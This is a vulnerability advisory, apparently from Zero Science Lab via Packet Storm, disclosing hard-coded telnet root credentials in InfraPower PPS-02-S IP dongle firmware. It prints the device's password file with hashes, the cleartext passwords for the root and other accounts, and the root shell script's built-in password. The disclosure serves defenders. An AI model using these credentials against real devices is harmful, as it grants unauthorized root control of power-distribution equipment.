InfraPower PPS-02-S Q213V1 suffers from a use of hard-coded credentials. The IP dongle firmware ships with hard-coded accounts that can be used to gain full system access (root) using the telnet daemon on port 23.
c22e5f79189599a09a64a8e8a09ef273e57831a00e9bfcb6261740a9f82efae3
InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: InfraPower suffers from a use of hard-coded credentials. The IP
dongle firmware ships with hard-coded accounts that can be used to gain
full system access (root) using the telnet daemon on port 23.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5371
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php
27.09.2016
--
# cat /etc/passwd
root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
# showing accounts in root group:
Username: root
Password: 8475
--
Username: service
Password: ipdongle
--
Username: www
Password: 9311
--
Username: www2
Password: 9311
# showing other less-privileged accounts:
Username: user
Password: 8475
--
Username: admin
Password: 8475
--------
/mnt/mtd # echo $SHELL
/sbin/root_shell.sh
/mnt/mtd # cat /sbin/root_shell.sh
#!/bin/sh
trap "" 2 3 9 24
# check login
passWork=`cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2`
if [ "$passWork" = "1" ]; then
login_file=/mnt/mtd/root_login
now_timestamp=`date +%s`
if [ -f $login_file ]; then
line=`wc -l $login_file | cut -c 1-9`
if [ "$line" != " 0" ] && [ "$line" != " 1" ] && [ "$line" != " 2" ]; then
pre_login=`tail -n 3 $login_file | cut -d " " -f 1`
pre_result1=`echo $pre_login | cut -d " " -f 1`
pre_result2=`echo $pre_login | cut -d " " -f 2`
pre_result3=`echo $pre_login | cut -d " " -f 3`
if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then
pre_timestamp=`tail -n 1 $login_file | cut -d " " -f 2`
result=`/sbin/checkLoginTime $pre_timestamp $now_timestamp`
if [ "$result" != "success" ]; then
echo $result
exit 0
fi
fi
fi
fi
echo -n "password:"
read pass
if [ "$pass" != "999" ]; then
echo "wrong password"
echo fail $now_timestamp >> $login_file
exit 0
fi
echo success $now_timestamp >> $login_file
fi
/bin/sh
/mnt/mtd #
--------
/mnt/mtd # ls
IMG001.exe boot.old.sh load_config.log main_conf net_conf passwd_conf snmp_conf web_conf
PDU3_ini box_conf log_memCheck.txt main_conf.bak net_conf.old port_conf snmpd.conf
PDU3_pol info.zip mac_addr me_login ntp_conf private start_service.log
--------
/mnt/mtd # df -h
Filesystem Size Used Available Use% Mounted on
tmpfs 256.0M 4.0K 256.0M 0% /tmp
/dev/mtdblock1 1.4M 96.0K 1.3M 7% /mnt/mtd
/dev/mtdblock5 1.0M 60.0K 964.0K 6% /mnt/mtd1
/dev/mtdblock6 1.0M 60.0K 964.0K 6% /mnt/mtd2
/dev/mtdblock7 1.0M 60.0K 964.0K 6% /mnt/mtd3
--------
/www # ls -al
drwxr-xr-x 5 1013 1014 0 Jan 13 08:41 .
drwxr-xr-x 16 root root 0 Nov 28 11:17 ..
-rwxr--r-- 1 1013 1014 6875 Apr 22 2014 CSSSource.php
-rwxr--r-- 1 1013 1014 291 Apr 22 2014 Config.php
-rwxr--r-- 1 1013 1014 1685 Apr 22 2014 ConnPort.php
-rwxr--r-- 1 1013 1014 5787 Apr 22 2014 FWUpgrade.php
-rwxr--r-- 1 1013 1014 7105 Apr 22 2014 Firmware.php
-rwxr--r-- 1 1013 1014 10429 Apr 22 2014 Function.php
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 General
-rwxr--r-- 1 1013 1014 1407 Apr 22 2014 Header.php
-rwxr--r-- 1 1013 1014 6775 Apr 22 2014 IPSettings.php
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 Images
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 JavaScript
-rwxr--r-- 1 1013 1014 408 Apr 22 2014 JavaSource.php
-rwxr--r-- 1 1013 1014 849 Apr 22 2014 ListFile.php
-rwxr--r-- 1 1013 1014 12900 Apr 22 2014 Login.php
-rwxr--r-- 1 1013 1014 355 Apr 22 2014 Logout.php
-rwxr--r-- 1 1013 1014 352 Apr 22 2014 Main_Config.php
-rwxr--r-- 1 1013 1014 5419 Apr 22 2014 Menu.php
-rwxr--r-- 1 1013 1014 942 Apr 22 2014 Menu_3.php
-rwxr--r-- 1 1013 1014 4491 Apr 22 2014 Ntp.php
-rwxr--r-- 1 1013 1014 23853 Apr 22 2014 OutletDetails.php
-rwxr--r-- 1 1013 1014 1905 Apr 22 2014 OutletDetails_Ajax.php
-rwxr--r-- 1 1013 1014 48411 Apr 22 2014 PDUDetails.php
-rwxr--r-- 1 1013 1014 4081 Apr 22 2014 PDUDetails_Ajax_Details.php
-rwxr--r-- 1 1013 1014 1397 Apr 22 2014 PDUDetails_Ajax_Outlet.php
-rwxr--r-- 1 1013 1014 19165 Apr 22 2014 PDULog.php
-rwxr--r-- 1 1013 1014 29883 Apr 22 2014 PDUStatus.php
-rwxr--r-- 1 1013 1014 4418 Apr 22 2014 PDUStatus_Ajax.php
-rwxr--r-- 1 1013 1014 7791 Apr 22 2014 PortSettings.php
-rwxr--r-- 1 1013 1014 24696 Apr 22 2014 SNMP.php
-rwxr--r-- 1 1013 1014 38253 Apr 22 2014 SensorDetails.php
-rwxr--r-- 1 1013 1014 27210 Apr 22 2014 SensorStatus.php
-rwxr--r-- 1 1013 1014 5984 Apr 22 2014 SensorStatus_Ajax.php
-rwxr--r-- 1 1013 1014 40944 Apr 22 2014 System.php
-rwxr--r-- 1 1013 1014 4373 Apr 22 2014 UploadEXE.php
-rwxr--r-- 1 1013 1014 9460 Apr 22 2014 User.php
-rwxr--r-- 1 1013 1014 23170 Apr 22 2014 WriteRequest.php
-rwxr--r-- 1 1013 1014 8850 Apr 22 2014 WriteRequest_Ajax.php
-rwxr--r-- 1 1013 1014 10811 Apr 22 2014 dball.php
-rwxr--r-- 1 1013 1014 771 Apr 22 2014 doupgrate.php
-rwxr--r-- 1 1013 1014 76 Apr 22 2014 index.php
-rwxr--r-- 1 1013 1014 49 Apr 22 2014 nfs.sh
-rwxr--r-- 1 1013 1014 5410 Apr 22 2014 production_test1.php
-rwxr--r-- 1 1013 1014 723 Apr 22 2014 vaildate.php
-rwxr--r-- 1 1013 1014 611 Apr 22 2014 wiseup.php
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed